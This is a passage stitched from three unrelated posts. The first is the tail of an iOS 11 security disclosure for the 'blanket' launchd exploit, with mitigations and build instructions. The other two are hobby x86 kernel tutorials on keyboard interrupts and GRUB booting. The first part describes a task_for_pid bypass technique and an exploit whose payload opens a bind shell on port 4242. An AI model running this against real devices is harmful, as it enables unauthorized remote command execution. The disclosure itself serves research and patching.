  5. Unsandboxed code execution, the host-priv port, and the ability to crash a task_for_pid-allow process can be combined to build a task_for_pid workaround. (The workaround is: call host_set_exception_ports to set a new host-level exception handler, then crash the task_for_pid-allow process to receive its task port and execute code with the entitlement.)

In app extensions:

  1. App extensions that share an application group can communicate using Mach messages, despite the documentation suggesting that communication between the host app and the app extension should be impossible.

Recommended fixes and mitigations

I recommend the following fixes, roughly in order of importance:

  1. Only deallocate Mach ports in the launchd service routines when returning KERN_SUCCESS. This will fix the Mach port replacement vulnerability.
  2. Close the task_threads loophole allowing a non-platform binary to use the task port of a platform binary to achieve code execution.
  3. Fix crashing issues in ReportCrash.
  4. The set of Mach services reachable from within the container sandbox should be minimized. I do not see a legitimate reason for most iOS apps to communicate with ReportCrash or SafetyNet.
  5. As many processes as possible should be sandboxed. I’m not sure whether druid needs to be unsandboxed to function properly, but if not, it should be placed in an appropriate sandbox.
  6. Dead code should be eliminated. SafetyNet does not seem to be performing its intended functionality. If it is no longer needed, it should probably be removed.
  7. Close the host_set_exception_ports-based task_for_pid workaround. For example, consider whether it’s worth restricting host_set_exception_ports to root or restricting the usability of the host-priv port under some configurations. This violates the elegant capabilities-based design of Mach, but host_set_exception_ports might be a promising target for abuse.
  8. Consider whether it’s worth adding task_conversion_eval to task_inspect_t.

Running blanket

Blanket should work on any device running iOS 11.2.6.

  1. Download the project:
    git clone https://github.com/bazad/blanket
    cd blanket
    
  2. Download and build the threadexec library, which is required for blanket to inject code in processes and tasks:
    git clone https://github.com/bazad/threadexec
    cd threadexec
    make ARCH=arm64 SDK=iphoneos EXTRA_CFLAGS='-mios-version-min=11.1 -fembed-bitcode'
    cd ..
    
  3. Download Jonathan Levin’s iOS binpack, which contains the binaries that will be used by the bind shell. If you change the payload to do something else, you won’t need the binpack.
    mkdir binpack
    curl http://newosxbook.com/tools/binpack64-256.tar.gz | tar -xf- -C binpack
    
  4. Open Xcode and configure the project. You will need to change the signing identifier and specify a custom application group entitlement.
  5. Edit the file headers/config.h and change APP_GROUP to whatever application group identifier you specified earlier.

After that, you should be able to build and run the project on the device.

If blanket is successful, it will run the payload binary (source in blanket_payload/blanket_payload.c), which by default spawns a bind shell on port 4242. You can connect to that port with netcat and run arbitrary shell commands.

Credits

Many thanks to Ian Beer and Jonathan Levin for their excellent iOS security and internals research.

Timeline

Apple assigned the Mach port replacement vulnerability in launchd CVE-2018-4280, and it was patched in iOS 11.4.1 and macOS 10.13.6 on July 9.

Let’s write a Kernel with keyboard and screen support

origin text

Today, we will extend that kernel to include a keyboard driver that can read the characters a-z and 0-9 from the keyboard and print them on screen.

Source code used for this article is available at Github repository — mkeykernel

We communicate with I/O devices using I/O ports. These ports are just specific addresses on the x86’s I/O bus, nothing more. The read/write operations on these ports are accomplished using specific instructions built into the processor.

 

Reading from and Writing to ports

read_port:
	mov edx, [esp + 4]
	in al, dx	
	ret

write_port:
	mov   edx, [esp + 4]    
	mov   al, [esp + 4 + 4]  
	out   dx, al  
	ret

I/O ports are accessed using the in and out instructions that are part of the x86 instruction set.

In read_port, the port number is taken as an argument. When a caller invokes your function, it pushes the arguments onto the stack. The argument is copied to the register edx using the stack pointer. The register dx is the lower 16 bits of edx. The in instruction here reads the port whose number is given by dx and puts the result in al. Register al is the lower 8 bits of eax. If you remember your college lessons, function return values are received through the eax register. Thus read_port lets us read I/O ports.

write_port is very similar. Here we take 2 arguments: port number and the data to be written. The out instruction writes the data to the port.
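On the C side, the two routines are declared roughly like this (a sketch; the exact prototypes live in the mkeykernel repo and may differ slightly). With cdecl, each argument occupies a 4-byte stack slot, which is why the assembly reads them at [esp + 4] and [esp + 8]:

extern char read_port(unsigned short port);
extern void write_port(unsigned short port, unsigned char data);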

 

Interrupts

Now, before we go ahead and write any device driver, we need to understand how the processor gets to know that a device has performed an event.

The easiest solution is polling — to keep checking the status of the device forever. This, for obvious reasons, is neither efficient nor practical. This is where interrupts come into the picture. An interrupt is a signal sent to the processor by hardware or software indicating an event. With interrupts, we can avoid polling and act only when the specific interrupt we are interested in is triggered.

A chip called the Programmable Interrupt Controller (PIC) is what makes x86 an interrupt-driven architecture. It manages hardware interrupts and routes them to the appropriate system interrupts.

When certain actions are performed on a hardware device, it sends a pulse called Interrupt Request (IRQ) along its specific interrupt line to the PIC chip. The PIC then translates the received IRQ into a system interrupt, and sends a message to interrupt the CPU from whatever it is doing. It is then the kernel’s job to handle these interrupts.

Without a PIC, we would have to poll all the devices in the system to see if an event has occurred in any of them.

Let’s take the case of a keyboard. The keyboard works through the I/O ports 0x60 and 0x64. Port 0x60 gives the data (pressed key) and port 0x64 gives the status. However, you have to know exactly when to read these ports.

Interrupts come in quite handy here. When a key is pressed, the keyboard gives a signal to the PIC along its interrupt line IRQ1. The PIC has an offset value that was stored during its initialization. It adds the input line number to this offset to form the interrupt number. The processor then looks up a data structure called the Interrupt Descriptor Table (IDT) to find the address of the interrupt handler corresponding to that interrupt number.

Code at this address is then run, which handles the event.

Setting up the IDT

struct IDT_entry{
	unsigned short int offset_lowerbits;
	unsigned short int selector;
	unsigned char zero;
	unsigned char type_attr;
	unsigned short int offset_higherbits;
};

struct IDT_entry IDT[IDT_SIZE];

void idt_init(void)
{
	unsigned long keyboard_address;
	unsigned long idt_address;
	unsigned long idt_ptr[2];

	/* populate IDT entry of keyboard's interrupt */
	keyboard_address = (unsigned long)keyboard_handler; 
	IDT[0x21].offset_lowerbits = keyboard_address & 0xffff;
	IDT[0x21].selector = 0x08; /* KERNEL_CODE_SEGMENT_OFFSET */
	IDT[0x21].zero = 0;
	IDT[0x21].type_attr = 0x8e; /* INTERRUPT_GATE */
	IDT[0x21].offset_higherbits = (keyboard_address & 0xffff0000) >> 16;
	

	/*     Ports
	*	 PIC1	PIC2
	*Command 0x20	0xA0
	*Data	 0x21	0xA1
	*/

	/* ICW1 - begin initialization */
	write_port(0x20 , 0x11);
	write_port(0xA0 , 0x11);

	/* ICW2 - remap offset address of IDT */
	/*
	* In x86 protected mode, we have to remap the PICs beyond 0x20 because
	* Intel have designated the first 32 interrupts as "reserved" for cpu exceptions
	*/
	write_port(0x21 , 0x20);
	write_port(0xA1 , 0x28);

	/* ICW3 - setup cascading */
	write_port(0x21 , 0x00);  
	write_port(0xA1 , 0x00);  

	/* ICW4 - environment info */
	write_port(0x21 , 0x01);
	write_port(0xA1 , 0x01);
	/* Initialization finished */

	/* mask interrupts */
	write_port(0x21 , 0xff);
	write_port(0xA1 , 0xff);

	/* fill the IDT descriptor */
	idt_address = (unsigned long)IDT ;
	idt_ptr[0] = (sizeof (struct IDT_entry) * IDT_SIZE) + ((idt_address & 0xffff) << 16);
	idt_ptr[1] = idt_address >> 16 ;

	load_idt(idt_ptr);
}
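The listing above also relies on a few declarations, roughly like these (a sketch; the repo keeps them in kernel.c and a header, possibly under slightly different names):

#define IDT_SIZE 256                  /* the IDT can hold 256 entries (0x00-0xFF) */
#define KEYBOARD_DATA_PORT 0x60       /* keyboard data port, read in the handler */
#define KEYBOARD_STATUS_PORT 0x64     /* keyboard status port */

extern void keyboard_handler(void);           /* defined in the assembly file */
extern void load_idt(unsigned long *idt_ptr); /* wraps the lidt instruction */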

We implement the IDT as an array of IDT_entry structures. We’ll discuss how the keyboard interrupt is mapped to its handler later in the article. First, let’s see how the PICs work.

Modern x86 systems have 2 PIC chips each having 8 input lines. Let’s call them PIC1 and PIC2. PIC1 receives IRQ0 to IRQ7 and PIC2 receives IRQ8 to IRQ15. PIC1 uses port 0x20 for Command and 0x21 for Data. PIC2 uses port 0xA0 for Command and 0xA1 for Data.

The PICs are initialized using 8-bit command words known as Initialization command words (ICW). See this link for the exact bit-by-bit syntax of these commands.

In protected mode, the first command you will need to give the two PICs is the initialize command ICW1 (0x11). This command makes the PIC wait for 3 more initialization words on the data port.

These commands tell the PICs about:

* Its vector offset. (ICW2)
* How the PICs are wired as master/slave. (ICW3)
* Additional information about the environment. (ICW4)

The second initialization command is the ICW2, written to the data ports of each PIC. It sets the PIC’s offset value. This is the value to which we add the input line number to form the Interrupt number.

PICs allow cascading of their outputs to the inputs of each other. This is set up using ICW3, where each bit represents the cascading status for the corresponding IRQ. For now, we won’t use cascading, so we set everything to zero.

ICW4 sets additional environmental parameters. We will just set the lowermost bit to tell the PICs we are running in 80x86 mode.

Tang ta dang !! PICs are now initialized.

 

Each PIC has an internal 8-bit register named the Interrupt Mask Register (IMR). This register stores a bitmap of the IRQ lines going into the PIC. When a bit is set, the PIC ignores the request. This means we can enable or disable the nth IRQ line by setting the nth bit in the IMR to 0 or 1 respectively. Reading from the data port returns the value in the IMR register, and writing to it sets the register. In our code, after initializing the PICs, we set all bits to 1, thereby disabling all IRQ lines. We will later enable the line corresponding to the keyboard interrupt. As of now, let’s disable all the interrupts !!
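As a concrete example (not part of the article’s code), enabling or disabling the nth line on PIC1 just means clearing or setting bit n of the IMR through the data port, using the read_port/write_port helpers from earlier:

/* IRQ lines 0-7 live on PIC1; a cleared bit enables the line, a set bit masks it. */
void enable_irq_line(unsigned char n)  { write_port(0x21, (unsigned char)read_port(0x21) & ~(1 << n)); }
void disable_irq_line(unsigned char n) { write_port(0x21, (unsigned char)read_port(0x21) |  (1 << n)); }

Given that all lines were just masked (0xFF), enabling line 1 yields exactly the 0xFD that kb_init writes later in this article.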

Now if IRQ lines are enabled, our PICs can receive signals via IRQ lines and convert them to interrupt number by adding with the offset. Now, we need to populate the IDT such that the interrupt number for the keyboard is mapped to the address of the keyboard handler function we will write.

Which interrupt number should the keyboard handler address be mapped against in the IDT?

The keyboard uses IRQ1, which is input line 1 of PIC1. We initialized PIC1 with an offset of 0x20 (see ICW2). To find the interrupt number, add 1 + 0x20, i.e. 0x21. So, the keyboard handler address has to be mapped against interrupt 0x21 in the IDT.

So, the next task is to populate the IDT for the interrupt 0x21.
We will map this interrupt to a function keyboard_handler which we will write in our assembly file.

Each IDT entry consists of 64 bits. In the IDT entry for the interrupt, we do not store the entire address of the handler function together. We split it into 2 parts of 16 bits. The lower 16 bits of the address are stored in the first 16 bits of the IDT entry and the higher 16 bits are stored in the last 16 bits of the IDT entry. This is done to maintain compatibility with the 286. You can see Intel pulls shrewd kludges like these in so many places !!

In the IDT entry, we also have to set the type — in this case, an interrupt gate, since we are trapping an interrupt. We also need to give the kernel code segment offset. The GRUB bootloader sets up a GDT for us. Each GDT entry is 8 bytes long, and the kernel code descriptor is the second segment, so its offset is 0x08 (more on this would be too much for this article). An interrupt gate is represented by 0x8e. The remaining 8 bits in the middle have to be filled with zeroes. In this way, we have filled the IDT entry corresponding to the keyboard’s interrupt.

Once the required mappings are done in the IDT, we have to tell the CPU where the IDT is located.
This is done via the lidt assembly instruction. lidt takes one operand, which must be a pointer to a descriptor structure that describes the IDT.

The descriptor is quite straightforward. It contains the size of the IDT in bytes and its address. I have used an array to pack the values. You may also populate it using a struct.

We have the pointer in the variable idt_ptr and then pass it on to lidt using the function load_idt().

load_idt:
	mov edx, [esp + 4]
	lidt [edx]
	sti
	ret

Additionally, the load_idt() function turns interrupts on using the sti instruction.

Once the IDT is set up and loaded, we can turn on the keyboard’s IRQ line using the interrupt mask we discussed earlier.

void kb_init(void)
{
	/* 0xFD is 11111101 - enables only IRQ1 (keyboard)*/
	write_port(0x21 , 0xFD);
}

 

Keyboard interrupt handling function

Well, now we have successfully mapped keyboard interrupts to the function keyboard_handler via the IDT entry for interrupt 0x21.
So, every time you press a key on your keyboard, you can be sure this function is called.

keyboard_handler:                 
	call    keyboard_handler_main
	iretd

This function just calls another function written in C and returns using the iret class of instructions. We could have written our entire interrupt handling process here, however it’s much easier to write code in C than in assembly — so we take it there.
iret/iretd should be used instead of ret when returning control from an interrupt handler to the program that was interrupted. This class of instructions pops the flags register that was pushed onto the stack when the interrupt occurred.

void keyboard_handler_main(void) {
	unsigned char status;
	char keycode;

	/* write EOI */
	write_port(0x20, 0x20);

	status = read_port(KEYBOARD_STATUS_PORT);
	/* Lowest bit of status will be set if buffer is not empty */
	if (status & 0x01) {
		keycode = read_port(KEYBOARD_DATA_PORT);
		if(keycode < 0)
			return;
		vidptr[current_loc++] = keyboard_map[keycode];
		vidptr[current_loc++] = 0x07;	
	}
}

We first signal an EOI (End Of Interrupt) acknowledgment by writing it to the PIC’s command port. Only after this will the PIC allow further interrupt requests. We have to read 2 ports here — the data port 0x60 and the command/status port 0x64.

We first read port 0x64 to get the status. If the lowest bit of the status is 0, the buffer is empty and there is no data to read. Otherwise, we can read the data port 0x60. This port gives us the keycode of the pressed key. Each keycode corresponds to a key on the keyboard. We use a simple character array defined in the file keyboard_map.h to map the keycode to the corresponding character. This character is then printed onto the screen using the same technique we used in the previous article.
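For illustration, the first few entries of such a lookup table look roughly like this (standard scancode set 1 values; the repo’s keyboard_map.h contains the complete table):

unsigned char keyboard_map[128] = {
	0, 27, '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '-', '=', '\b',
	'\t', 'q', 'w', 'e', 'r', 't', 'y', 'u', 'i', 'o', 'p', '[', ']', '\n',
	0 /* left ctrl */, 'a', 's', 'd', 'f', 'g', 'h', 'j', 'k', 'l', ';', '\'',
	/* ...remaining scancodes, unhandled ones left as 0... */
};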

In this article, for the sake of brevity, I am only handling lowercase a-z and digits 0-9. You can easily extend this to include special characters, ALT, SHIFT and CAPS LOCK. You can tell whether a key was pressed or released from the status port output and perform the desired action. You can also map any combination of keys to special functions such as shutdown.

You can build the kernel, run it on a real machine or an emulator (QEMU) exactly the same way as in the earlier article (its repo).

Start typing !!

kernel running with keyboard support

 

References and Thanks

  1. wiki.osdev.org
  2. osdever.net

 

 

Let’s write a Kernel

origin text

Let us write a simple kernel which could be loaded with the GRUB bootloader on an x86 system. This kernel will display a message on the screen and then hang.

How does an x86 machine boot

Before we think about writing a kernel, let’s see how the machine boots up and transfers control to the kernel:

Most registers of the x86 CPU have well defined values after power-on. The Instruction Pointer (EIP) register holds the memory address of the instruction being executed by the processor. EIP is hardcoded to the value 0xFFFFFFF0. Thus, the x86 CPU is hardwired to begin execution at the physical address 0xFFFFFFF0, which is 16 bytes below the top of the 32-bit address space. This memory address is called the reset vector.

Now, the chipset’s memory map makes sure that 0xFFFFFFF0 is mapped to a certain part of the BIOS, not to the RAM. Meanwhile, the BIOS copies itself to the RAM for faster access. This is called shadowing. The address 0xFFFFFFF0 will contain just a jump instruction to the address in memory where BIOS has copied itself.

Thus, the BIOS code starts its execution. The BIOS first searches for a bootable device in the configured boot device order. It checks for a certain magic number to determine whether the device is bootable or not (whether bytes 511 and 512 of the first sector are 0xAA55).

Once the BIOS has found a bootable device, it copies the contents of the device’s first sector into RAM starting from physical address 0x7c00; it then jumps to that address and executes the code just loaded. This code is called the bootloader.

The bootloader then loads the kernel at the physical address 0x100000. The address 0x100000 is used as the start-address for all big kernels on x86 machines.

All x86 processors begin in a simplistic 16-bit mode called real mode. The GRUB bootloader makes the switch to 32-bit protected mode by setting the lowest bit of CR0 register to 1. Thus the kernel loads in 32-bit protected mode.

Do note that in the case of the Linux kernel, GRUB detects the Linux boot protocol and loads the kernel in real mode; the Linux kernel itself then makes the switch to protected mode.

 

What all do we need?

* An x86 computer (of course)
* Linux
* NASM assembler
* gcc
* ld (GNU Linker)
* grub

 

Source Code

Source code is available at my Github repository — mkernel

 

The entry point using assembly

We like to write everything in C, but we cannot avoid a little bit of assembly. We will write a small file in x86 assembly-language that serves as the starting point for our kernel. All our assembly file will do is invoke an external function which we will write in C, and then halt the program flow.

How do we make sure that this assembly code will serve as the starting point of the kernel?

We will use a linker script that links the object files to produce the final kernel executable (explained in more detail later). In this linker script, we will explicitly specify that we want our binary to be loaded at the address 0x100000. This address, as I have said earlier, is where the kernel is expected to be. Thus, the bootloader will take care of firing the kernel’s entry point.

Here’s the assembly code:

;;kernel.asm
bits 32			;nasm directive - 32 bit
section .text

global start
extern kmain	        ;kmain is defined in the c file

start:
  cli 			;block interrupts
  mov esp, stack_space	;set stack pointer
  call kmain
  hlt		 	;halt the CPU

section .bss
resb 8192		;8KB for stack
stack_space:

The first instruction bits 32 is not an x86 assembly instruction. It’s a directive to the NASM assembler that specifies it should generate code to run on a processor operating in 32 bit mode. It is not strictly required in our example; however, it is included here as it’s good practice to be explicit.

The second line begins the text section (aka code section). This is where we put all our code.

global is another NASM directive that marks symbols from the source code as global. By doing so, the linker knows where the symbol start is, which happens to be our entry point.

kmain is our function that will be defined in our kernel.c file. extern declares that the function is defined elsewhere.

Then, we have the start function, which calls the kmain function and halts the CPU using the hlt instruction. Interrupts can wake the CPU from an hlt instruction, so we disable interrupts beforehand using the cli instruction. cli is short for clear-interrupts.

We should ideally set aside some memory for the stack and point the stack pointer (esp) to it. However, it seems like GRUB does this for us and the stack pointer is already set at this point. But, just to be sure, we will allocate some space in the BSS section and point the stack pointer to the beginning of the allocated memory. We use the resb instruction, which reserves memory given in bytes. After it, a label is left which will point to the edge of the reserved piece of memory. Just before kmain is called, the stack pointer (esp) is made to point to this space using the mov instruction.

 

The kernel in C

In kernel.asm, we made a call to the function kmain(). So our C code will start executing at kmain():

/*
*  kernel.c
*/
void kmain(void)
{
	const char *str = "my first kernel";
	char *vidptr = (char*)0xb8000; 	//video mem begins here.
	unsigned int i = 0;
	unsigned int j = 0;

	/* this loop clears the screen
	* there are 25 lines each of 80 columns; each element takes 2 bytes */
	while(j < 80 * 25 * 2) {
		/* blank character */
		vidptr[j] = ' ';
		/* attribute-byte - light grey on black screen */
		vidptr[j+1] = 0x07; 		
		j = j + 2;
	}

	j = 0;

	/* this loop writes the string to video memory */
	while(str[j] != '\0') {
		/* the character's ascii */
		vidptr[i] = str[j];
		/* attribute-byte: give character black bg and light grey fg */
		vidptr[i+1] = 0x07;
		++j;
		i = i + 2;
	}
	return;
}

All our kernel will do is clear the screen and write to it the string “my first kernel”.

First we make a pointer vidptr that points to the address 0xb8000. This address is the start of video memory in protected mode. The screen’s text memory is simply a chunk of memory in our address space. The memory-mapped I/O for the screen starts at 0xb8000 and supports 25 lines, with each line containing 80 ASCII characters.

Each character element in this text memory is represented by 16 bits (2 bytes), rather than 8 bits (1 byte) which we are used to.  The first byte should have the representation of the character as in ASCII. The second byte is the attribute-byte. This describes the formatting of the character including attributes such as color.

To print the character s in green color on black background, we will store the character s in the first byte of the video memory address and the value 0x02 in the second byte.
0 represents black background and 2 represents green foreground.
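As a tiny worked example (a sketch meant for the same freestanding kernel environment, not part of the article’s code):

void print_green_s(void)
{
	char *vidptr = (char*)0xb8000;	/* start of video memory */
	vidptr[0] = 's';		/* character byte */
	vidptr[1] = 0x02;		/* attribute byte: black bg (0), green fg (2) */
}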

Have a look at table below for different colors:

0 - Black, 1 - Blue, 2 - Green, 3 - Cyan, 4 - Red, 5 - Magenta, 6 - Brown, 7 - Light Grey, 8 - Dark Grey, 9 - Light Blue, 10/a - Light Green, 11/b - Light Cyan, 12/c - Light Red, 13/d - Light Magenta, 14/e - Light Brown, 15/f – White.

 

In our kernel, we will use light grey character on a black background. So our attribute-byte must have the value 0x07.

In the first while loop, the program writes the blank character with the 0x07 attribute over all 80 columns of the 25 lines, thus clearing the screen.

In the second while loop, characters of the null terminated string “my first kernel” are written to the chunk of video memory with each character holding an attribute-byte of 0x07.

This should display the string on the screen.

 

The linking part

We will assemble kernel.asm with NASM to an object file; and then using GCC we will compile kernel.c to another object file. Now, our job is to get these objects linked to an executable bootable kernel.

For that, we use an explicit linker script, which can be passed as an argument to ld (our linker).

/*
*  link.ld
*/
OUTPUT_FORMAT(elf32-i386)
ENTRY(start)
SECTIONS
 {
   . = 0x100000;
   .text : { *(.text) }
   .data : { *(.data) }
   .bss  : { *(.bss)  }
 }

First, we set the output format of our output executable to be 32 bit Executable and Linkable Format (ELF). ELF is the standard binary file format for Unix-like systems on x86 architecture.

ENTRY takes one argument. It specifies the symbol name that should be the entry point of our executable.

SECTIONS is the most important part for us. Here, we define the layout of our executable. We could specify how the different sections are to be merged and at what location each of these is to be placed.

Within the braces that follow the SECTIONS statement, the period character (.) represents the location counter.
The location counter is always initialized to 0x0 at the beginning of the SECTIONS block. It can be modified by assigning a new value to it.

Remember, earlier I told you that kernel’s code should start at the address 0x100000. So, we set the location counter to 0x100000.

Have a look at the next line: .text : { *(.text) }

The asterisk (*) is a wildcard character that matches any file name. The expression *(.text) thus means all .text input sections from all input files.

So, the linker merges all text sections of the object files to the executable’s text section, at the address stored in the location counter. Thus, the code section of our executable begins at 0x100000.

After the linker places the text output section, the value of the location counter will become 0x100000 + the size of the text output section.

Similarly, the data and bss sections are merged and placed at the then-current values of the location counter.

 

Grub and Multiboot

Now, we have all our files ready to build the kernel. But, since we like to boot our kernel with the GRUB bootloader, there is one step left.

There is a standard for loading various x86 kernels using a bootloader, called the Multiboot specification.

GRUB will only load our kernel if it complies with the Multiboot spec.

According to the spec, the kernel must contain a header (known as the Multiboot header) within its first 8 kilobytes.

Further, this Multiboot header must contain 3 fields that are 4-byte aligned, namely:

  • magic field: containing the magic number 0x1BADB002, to identify the header.
  • flags field: We will not care about this field. We will simply set it to zero.
  • checksum field: the checksum field, when added to the ‘magic’ and ‘flags’ fields, must give zero.

So our kernel.asm will become:

;;kernel.asm

;nasm directive - 32 bit
bits 32
section .text
        ;multiboot spec
        align 4
        dd 0x1BADB002            ;magic
        dd 0x00                  ;flags
        dd - (0x1BADB002 + 0x00) ;checksum. m+f+c should be zero

global start
extern kmain	        ;kmain is defined in the c file

start:
  cli 			;block interrupts
  mov esp, stack_space	;set stack pointer
  call kmain
  hlt		 	;halt the CPU

section .bss
resb 8192		;8KB for stack
stack_space:

The dd defines a double word of size 4 bytes.

Building the kernel

We will now create object files from kernel.asm and kernel.c and then link it using our linker script.

nasm -f elf32 kernel.asm -o kasm.o

will run the assembler to create the object file kasm.o in ELF-32 bit format.

gcc -m32 -c kernel.c -o kc.o

The ‘-c’ option makes sure that linking doesn’t implicitly happen after compiling.

ld -m elf_i386 -T link.ld -o kernel kasm.o kc.o

will run the linker with our linker script and generate the executable named kernel.

 

Configure your grub and run your kernel

GRUB requires your kernel to be of the name pattern kernel-<version>. So, rename the kernel. I renamed my kernel executable to kernel-701.

Now place it in the /boot directory. You will require superuser privileges to do so.

In your GRUB configuration file grub.cfg you should add an entry, something like:

title myKernel
	root (hd0,0)
	kernel /boot/kernel-701 ro

 

Don’t forget to remove the directive hiddenmenu if it exists.

Reboot your computer, and you’ll get a list selection with the name of your kernel listed.

Select it and you should see:

image

That’s your kernel!!

 

PS:

* It’s always advisable to get yourself a virtual machine for all kinds of kernel hacking.
* To run this on GRUB 2, which is the default bootloader for newer distros, your config should look like this:

menuentry 'kernel 701' {
	set root='hd0,msdos1'
	multiboot /boot/kernel-701 ro
}

 

* Also, if you want to run the kernel on the qemu emulator instead of booting with GRUB, you can do so by:

qemu-system-i386 -kernel kernel